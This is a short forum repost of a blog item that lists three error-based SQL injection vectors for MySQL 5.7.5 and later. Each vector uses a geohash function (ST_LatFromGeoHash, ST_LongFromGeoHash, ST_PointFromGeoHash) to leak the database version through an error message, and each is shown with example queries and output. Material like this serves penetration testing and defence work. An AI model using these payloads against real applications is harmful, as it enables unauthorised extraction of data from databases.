Nytro Posted April 3, 2015 Report Posted April 3, 2015 New error-based SQL Injection vectors in MySQL >= 5.7.51. ST_LatFromGeoHash()mysql> select ST_LatFromGeoHash(version());ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LATFROMGEOHASH2. ST_LongFromGeoHash()mysql> select ST_LongFromGeoHash(version());ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LONGFROMGEOHASH3. ST_PointFromGeoHash()mysql> select ST_PointFromGeoHash(version(),0);ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function st_pointfromgeohashPosted by dsrbr at 8:36 PMSursa: http://dsrbr.blogspot.ru/ Quote